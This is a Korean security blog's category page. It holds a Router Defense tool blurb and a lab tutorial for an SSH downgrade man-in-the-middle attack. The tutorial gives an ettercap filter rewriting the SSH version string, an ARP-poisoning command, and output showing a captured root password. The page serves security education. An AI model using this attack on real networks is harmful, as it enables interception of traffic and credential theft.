'네트워크/네트워크보안'에 해당되는 글 5건

  1. 2011.01.27 Router Defense
  2. 2011.01.21 ssh mith with ettercat
  3. 2010.05.07 무선랜 보안 안내서
  4. 2009.07.20 Nmap 5.0
  5. 2009.03.04 Where can I download a free firewall?
Router Defense deep dives into Cisco routers and switches configuration and do security recommandations. It gives the opportunity to audit network devices in a quick, efficient way and actionable practices. The author created this tool because he was frustrated of never seeing a network device with simple security best practices applied in the wild.

링크 : http://code.google.com/p/routerdefense/
Posted by 김주일
내용
- 서버와 클라이언트 통신 시 ssh 프로토콜 버전 협상이 발생
(Default : SSH-1.99 >> 2버전)
- MITM을 통해 취약한 버전의 SSH 통신토록 설정

SSH v1 VS SSH v2


0x01. 필터링 규칙 생성
# vi ssh_rb.ef
if ( search(DATA.data, "SSH-1.99"))
{
    replace("SSH-1.99","SSH-1.51");
}
 
# etterfilter -o ssh_rb.ef2 ssh_rb.ef

0x02. MITM 시도
# ettercap -T -q -F ssh_rb.ef2 -M ARP /10.0.0.130/ //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Content filters loaded from ssh_rb.ef2...
Listening on eth0... (Ethernet)

  eth0 ->    00:0C:29:BF:9E:AC        10.0.0.134     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

4 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 10.0.0.130 00:0C:29:42:2A:82

 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

SSH : 10.0.0.130:22 -> USER: root  PASS: asdfasdf



참고
- http://superuser.egloos.com/3199639
- http://www.irongeek.com/i.php?page=security/ettercapfilter


Posted by 김주일
Posted by 김주일
Posted by 김주일
Posted by 김주일